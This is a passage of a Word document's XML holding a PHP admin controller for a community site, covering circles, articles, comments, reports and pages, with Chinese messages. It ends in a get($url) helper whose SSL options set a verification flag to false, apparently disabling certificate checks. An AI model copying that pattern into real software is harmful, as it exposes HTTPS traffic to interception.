    </w:p>
    <w:p w14:paraId="7565D5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post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBA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6094F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_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43E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名称社区已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EACC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905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BC1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D9F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5683F4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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44FC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4863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1C9C7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896A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071EF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FB9A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758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B0531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158C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ircle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EFC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1DC7C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3E15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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A65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_id', $circle['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EE7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ircle', $circle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EE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9D5A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6FA37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384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3A3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54A18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757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8F7C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B13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ete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72D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066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3BC0A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69D37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70441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003D5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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3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B223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7B3AB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77790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60ECB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566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4CCF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559B3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DFE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B8823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00C53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F38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597B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4235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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12A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4F4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 = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FB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 = input('param.search', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E7B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circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA40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id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8E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circle_id', $circle_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74684C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50F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earch != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE43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title', 'like', '%' . $search . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3CFF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1DB3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query-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87CC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articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDE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DAEFB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ED9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A10D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A28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 = input('param.article_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A98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 = input('param.search', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E5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3DE950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3AC83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2D668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ircles', $circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B75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0107F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290263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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC235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449ABA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7EE6C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gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D35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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3B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标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24A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746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1FB131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article')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE6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68511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0A1B4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post['circle_id'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327B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post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35130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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E1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35D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AB04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47D8E4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CAC7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0C5AFC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itle']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19868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_article = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D3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lt;&gt;', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBD9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post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D945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13D4F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_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E9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标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E412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7A9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3F7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271179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646633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FD14F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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE57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article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5E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51B1D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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0BA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FCD1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4A1924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post['circle_id']) &amp;&amp; $article['circle_id'] != $post['circle_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419AD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post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE02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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191F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article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A7C4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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472899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981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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D5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07C66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F8A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5501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1257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post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BB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9E2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BE761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circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BFCC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id', $id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E26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A5E3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earch != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BB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title', 'like', '%' . $search . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C888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360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query-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2D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 $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6D5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54A0E7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D57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68050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9C98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_article()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993A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D03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article_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6933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7AE4F3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3C538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ADB9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ircles', $circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FA6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648C1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6D88F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B328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1D0496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5400EC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gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EE2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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8684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标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E5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8C5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0791D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article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6F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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06587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BD718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55C066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post['circle_id'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B8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post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FB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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E7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1F5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CE5A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6200C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7AC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2852D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post['title'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF06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itled_article = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42A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lt;&gt;', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C6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post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD4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E3FE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_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459D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相同标题文章已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CA5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2BF4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571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6EADA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1668B6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A1E3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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05315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_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52092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43E04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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF6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435B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0CE82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circle_id'] != $post['circle_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D51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post['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A8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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB6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article['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875C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article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C79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8A3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965A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5B3798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D779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6A94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2CC4F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post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63127C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385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7700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0EE86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gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBBC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B777C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article', $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5C1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64A5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2BF41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69BA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E50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61FD88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5B2D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2F06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F90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sAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB5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F48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42375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60D237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ost['des'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2D9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tval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742BE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ntval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76982F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A1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id', $id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC3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Field('des', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E9D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AEE4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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877C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50F6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7A018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9EA9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9E484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AB90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All()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D89E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52B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737861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6C3C1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post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59521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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80FA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gt;delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18C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0579D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7C4DC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E5978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595E8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A781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A1928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未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EA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799D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9A2F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0B6186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81D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BDE3A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80F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ll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C62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925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0697B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05F40F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A3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post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB6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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142E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ost as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E54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del') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAA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delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E5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4950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where('id', $v)-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F5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FAD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9627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147AE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4952AC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3AD5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2B5F71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4F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9F45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未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9923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7004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1E21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28919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62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9381D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D239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63F22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9A12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1DBE4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 ? input('id') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EA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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263FA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0' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '1' =&gt; '&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '3' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73435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78F92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 = Db::name('circle')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF4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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DAC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0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04133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管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D123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ype == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DD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拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E0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ype == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D51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管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F4A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25D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DC66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uid'] &amp;&amp; $type == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C78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where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49759B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dd = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE23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Hide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64129C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core = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39169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Num = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B7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Code = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FFCC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Jingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6402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Money = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE6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5DA64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Money) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC54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money',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441FB1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0EE4E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Money, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD52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aritlce['uid'])-&gt;setInc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B05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9B7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DA0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Score) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F18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score',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57D11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aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B3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Score, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE7F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aritlce['id'])-&gt;setInc('score', $articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B8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C74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45A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Jingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505F1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jingyan',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200DC8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Jingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE25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Jingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4619A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Inc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A07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B3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12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审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9A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AD90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gt;where('id', $aritlce['id'])-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B864F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AAAF7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ext[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBA7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4BFE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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAA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6FC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1A3D8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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C21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F65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3E67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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827F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66CB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2A177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6BC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view()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC6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2FB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 = ['in', '2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09646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circle')-&gt;where($map)-&gt;order('des desc,id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08B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253E32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5E223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0E9F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B0FB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1D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B6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45D7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gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D62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68A1F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292AD3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AFC46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B2E0A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0537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Add()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57F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DE0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655230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1D167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032D2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circle')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FA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F3A4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0A1B6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8F1A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492B75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500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719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0798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40E05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b::name('article_ping')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A82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gt;where('id', $name['aid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA63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List = Db::name('article_ping_xia')-&gt;where('ping_id', $id)-&gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616E6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pingList-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794C0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0B22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name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E018B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ircle', $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60F1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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E128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ingList', $pingList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886E9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B06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3D8A6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E9F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DF8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11232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79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ACE1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7B9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Del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BD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EC05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678F5B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01C0A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7D27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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B20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4812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1992CD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FDC1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2A4DC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E88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AE06D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5EE43C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FFA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DF22C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1E9E22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8CC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A323F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4AAE6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XaiDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D00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DBB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5CBEA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1883B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11681D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_xia')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251E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C35F0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3C45D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6717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56FFF5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6C0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EB915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0D738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440E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1DF3C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4C14F7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7038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B3319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5D8F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61E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FB7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jubao')-&gt;order('id desc')-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B0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6FAAF5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0C86E6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2E368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E0A4A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D5D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Huifu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9F6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424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219E4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511A2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content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731037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03DD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jubao')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93EB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BABC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minId = Session::get('admin', 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4767D3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db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D1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db['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77205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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C63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5AC28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dmin_id'] = $adminId['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74436B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jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59922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7DF3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回复成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1860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4B9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回复失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB9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68A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6E3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E426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636B0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C3F1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C378E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3A6F8F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DBEB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3D367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3FD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Del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AD8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66E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7F52D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28DCD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3A9FF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jubao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26416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68E5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0E5CE5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CDC8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52E3C7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70C4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C2DEA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58784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8297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F07DD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0BD52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FAB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BB0A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782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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F3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782C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page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856D8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16C7A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4291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85C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Add()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EDE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603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15A0F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5C5F1A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47824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6BF2A0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itle']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A3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 = Db::name('page')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC70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b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFF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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA18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19B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FDD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age')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15306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CD99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431D9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0CCD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2E855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E4E1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039CB3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age')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E0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db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB6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7068B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BFE20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5F1FAD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49EC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F360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ED6BE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1F643A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b::name('page')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332F4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name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3C4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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36C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EB643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713DA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8DC6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1298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1A7131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7C5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3E028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717C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get($url, $json = false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3B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4BE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ContextOptions = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63112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sl" =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23496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 =&gt; false,</w:t>
      </w:r>
